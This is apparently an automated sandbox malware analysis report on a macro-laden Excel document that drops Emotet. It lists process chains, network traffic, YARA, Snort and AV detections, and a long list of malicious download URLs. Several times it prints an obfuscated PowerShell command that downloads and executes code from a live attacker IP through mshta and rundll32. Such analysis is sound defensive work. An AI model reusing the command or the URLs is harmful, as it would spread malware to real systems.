Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000006.00000002.661397163.00000000000F5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X			Jump to behavior

Yara detected Xls With Macro 4.0

Source: Yara match	File source: imedpub_8.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\imedpub_8.xls, type: DROPPED

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq	Jump to behavior

Language, Device and Operating System Detection

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match

File source: C:\ProgramData\JooSee.dll, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
164.90.147.135	hostfeeling.com	United States	14061	DIGITALOCEAN-ASNUS	false
91.240.118.172	unknown	unknown	49453	GLOBALLAYERNL	true
103.206.244.105	jurnalpjf.lan.go.id	Indonesia	131111	CEPATNET-AS-IDPTMoraTelematikaIndonesiaID	false

Contacted Domains

Name	IP	Active
hostfeeling.com	164.90.147.135	true
jurnalpjf.lan.go.id	103.206.244.105	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://91.240.118.172/gg/ff/fe.png	true	Avira URL Cloud: malware	unknown
http://jurnalpjf.lan.go.id/assets/iM/	true	Avira URL Cloud: malware	unknown
http://91.240.118.172/gg/ff/fe.html	true	Avira URL Cloud: malware	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Antivirus detection for URL or domain

Source: http://maxtdeveloper.com/okw9yx/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\ProgramData\JooSee.dll

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: hostfeeling.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GLOBALLAYERNL GLOBALLAYERNL

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/iM/ HTTP/1.1Host: jurnalpjf.lan.go.idConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 164.90.147.135 164.90.147.135
Source: Joe Sandbox View	IP Address: 91.240.118.172 91.240.118.172

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172
Source: unknown	TCP traffic detected without corresponding DNS query: 91.240.118.172

Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comi equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000003.434549077.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436353034.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410082336.000000000036C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432177164.000000000036C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.410097515.0000000000380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.html
Source: imedpub_8.xls.0.dr	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlB
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.412420079.000000000285D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.411930557.0000000002855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
Source: mshta.exe, 00000004.00000002.436281987.0000000000300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlmshta
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlngs
Source: mshta.exe, 00000004.00000002.436317655.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.htmlr
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.p
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.png
Source: powershell.exe, 00000006.00000002.663377488.00000000036F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.240.118.172/gg/ff/fe.pngPE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://activetraining.sytes.net/libraries/8s/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-adm
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.suk
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-cont
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://it-o.biz/bitrix/xoDdDe/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/asset
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jurnalpjf.lan.go.id/assets/iM/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/f
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
Source: powershell.exe, 00000006.00000002.661371984.00000000000C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.410185425.000000000310D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436631636.00000000030E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gudangtasorichina.com/wp-content/GG01c/PE3
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/9
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/
Source: powershell.exe, 00000006.00000002.663511802.0000000003845000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://property-eg.com/mlzkir/97v/PE3

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

Jump to behavior

Source: unknown

DNS traffic detected: queries for: hostfeeling.com

